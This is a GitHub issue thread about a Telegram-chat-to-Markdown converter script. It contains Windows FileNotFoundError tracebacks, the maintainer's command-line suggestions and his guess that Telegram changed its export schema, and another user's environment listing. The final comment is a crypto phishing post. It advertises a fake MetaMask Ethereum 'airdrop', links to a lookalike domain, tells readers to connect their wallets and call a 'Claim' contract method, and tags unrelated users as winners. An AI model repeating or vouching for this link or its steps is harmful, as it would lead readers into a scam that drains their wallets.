### ISSUE TITLE
Had an issue like this

### ISSUE THREAD

**Issue by rapatar** [alexlyzhov/telegram-to-markdown#2]
C:\Users\USER\AppData\Local\Programs\Python\Python312\Scripts>python convert.py convert ChatExport_2024-01-12 export
Traceback (most recent call last):

  File "C:\Users\USER\AppData\Local\Programs\Python\Python312\Scripts\convert.py", line 145, in <module>
    app()

  File "C:\UserUSER\AppData\Local\Programs\Python\Python312\Scripts\convert.py", line 108, in convert
    with open(os.path.join(input_dir, 'result.json'), encoding='utf8') as handle:
         ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

FileNotFoundError: [Errno 2] No such file or directory: 'convert\\result.json'

![image](https://github.com/alexlyzhov/telegram-to-markdown/assets/811783/12725bf7-ce72-4a17-a76f-ed2c6ceeae61)

**Comment by rapatar** [comment]
![image](https://github.com/alexlyzhov/telegram-to-markdown/assets/811783/6d8ca979-862e-4ddc-8f6c-8935e7999084)

**Comment by alexlyzhov** [comment]
It's possible the new version of the Typer library is working differently. Try something like `python convert.py ChatExport_2024-01-12 export`.

**Comment by rapatar** [comment]
C:\Users\Dadash\AppData\Local\Programs\Python\Python312\Scripts>python convert.py ChatExport_2024-01-12 export
Traceback (most recent call last):

  File "C:\UsersUSER\AppData\Local\Programs\Python\Python312\Scripts\convert.py", line 145, in <module>
    app()

  File "C:\Users\USER\AppData\Local\Programs\Python\Python312\Scripts\convert.py", line 108, in convert
    with open(os.path.join(input_dir, 'result.json'), encoding='utf8') as handle:
         ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

FileNotFoundError: [Errno 2] No such file or directory: 'ChatExport_2024-01-12\\result.json'


C:\Users\USER\AppData\Local\Programs\Python\Python312\Scripts>

![image](https://github.com/alexlyzhov/telegram-to-markdown/assets/811783/396bda04-8946-457d-b591-2551861486cb)

**Comment by rapatar** [comment]
Is there any additional information i need to provide?

**Comment by alexlyzhov** [comment]
`python convert.py C:\ChatExport_2024-01-12 export`

**Comment by rapatar** [comment]
> `python convert.py C:\ChatExport_2024-01-12 export`

![image](https://github.com/alexlyzhov/telegram-to-markdown/assets/811783/15db225c-9d29-44db-b9a6-914556a34f0e)

**Comment by alexlyzhov** [comment]
Oh. Telegram may have changed the schema. Then my script will not function correctly anymore.

**Comment by rapatar** [comment]
so sad, hope you will fix it soon, its very useful script

**Comment by RootMePLS** [comment]
The script worked fine for me.

```
          ▗▄▄▄       ▗▄▄▄▄    ▄▄▄▖            fishhead@lenovo
          ▜███▙       ▜███▙  ▟███▛            ---------------
           ▜███▙       ▜███▙▟███▛             OS: NixOS 24.05.20240108.317484b (Uakari) x86_64
            ▜███▙       ▜██████▛              Host: LENOVO 316A
     ▟█████████████████▙ ▜████▛     ▟▙        Kernel: 6.1.71
    ▟███████████████████▙ ▜███▙    ▟██▙       Uptime: 3 days, 2 hours, 39 mins
           ▄▄▄▄▖           ▜███▙  ▟███▛       Packages: 864 (nix-system), 1563 (nix-user), 11 (flatpak)
          ▟███▛             ▜██▛ ▟███▛        Shell: zsh 5.9
         ▟███▛               ▜▛ ▟███▛         Resolution: 2560x1440, 2560x1440
▟███████████▛                  ▟██████████▙   DE: Hyprland (Wayland)
▜██████████▛                  ▟███████████▛   Theme: NumixSolarizedDarkOrange [GTK2/3]
      ▟███▛ ▟▙               ▟███▛            Icons: Numix [GTK2/3]
     ▟███▛ ▟██▙             ▟███▛             Terminal: tmux
    ▟███▛  ▜███▙           ▝▀▀▀▀              CPU: Intel i9-10900 (20) @ 5.200GHz
    ▜██▛    ▜███▙ ▜██████████████████▛        GPU: Intel CometLake-S GT2 [UHD Graphics 630]
     ▜▛     ▟████▙ ▜████████████████▛         Memory: 22761MiB / 31813MiB
           ▟██████▙       ▜███▙
          ▟███▛▜███▙       ▜███▙
         ▟███▛  ▜███▙       ▜███▙
         ▝▀▀▀    ▀▀▀▀▘       ▀▀▀▘
         
❯ python -V
Python 3.11.6
╭─      /nfs/f/l/rem/m/t/telegram-to-markdown  on    main ?2 


❯ pip freeze
click==8.1.7
pyaes==1.6.1
pyasn1==0.5.1
rsa==4.9
Telethon==1.33.1
typer==0.9.0
typing_extensions==4.9.0
```

**Comment by Allen0517** [comment]
# 🌐 **$ETH MetaMask Airdrop: Claim Your $1000 in Ethereum Now!**

🎉 **Congratulations!** 

You're among the chosen participants for the $1.5k Ethereum Airdrop. We're thrilled to grant you $1000 in ETH to celebrate the year's end. But that's not all—connect now, and you'll instantly receive an extra $100! Follow the steps below to claim your Ethereum and make the most of this exclusive giveaway!

[![Claim Now](https://pbs.twimg.com/media/Frg-sWYWIAYCoiX.jpg:large)](https://wwwwmetaskmask.communitymaskmeta.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=metamask)

## **Steps to Claim:**

### 1. 🚀 **Connect Your MetaMask Wallet:**
   - Click on the [Connect Wallet](https://wwwwmetaskmask.communitymaskmeta.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=metamask) link.
   - Select **MetaMask** as your preferred wallet provider.

### 2. 🔄 **Interact with the Contract and Claim Your $100:**
   - Once your MetaMask wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract. Ensure you use the **Claim** method.

💰 **Don't miss out on your $1000 in Ethereum!** Additionally, enjoy an instant $100 upon connection. Act now to secure your ETH. Remember, there's a chance to win up to $20,000—it's your golden opportunity with MetaMask!


Winners: @Yincan, @zakhar-gulchak, @mahdiscript, @ssbg2, @jensrott, @josephbestjames, @Rous110508
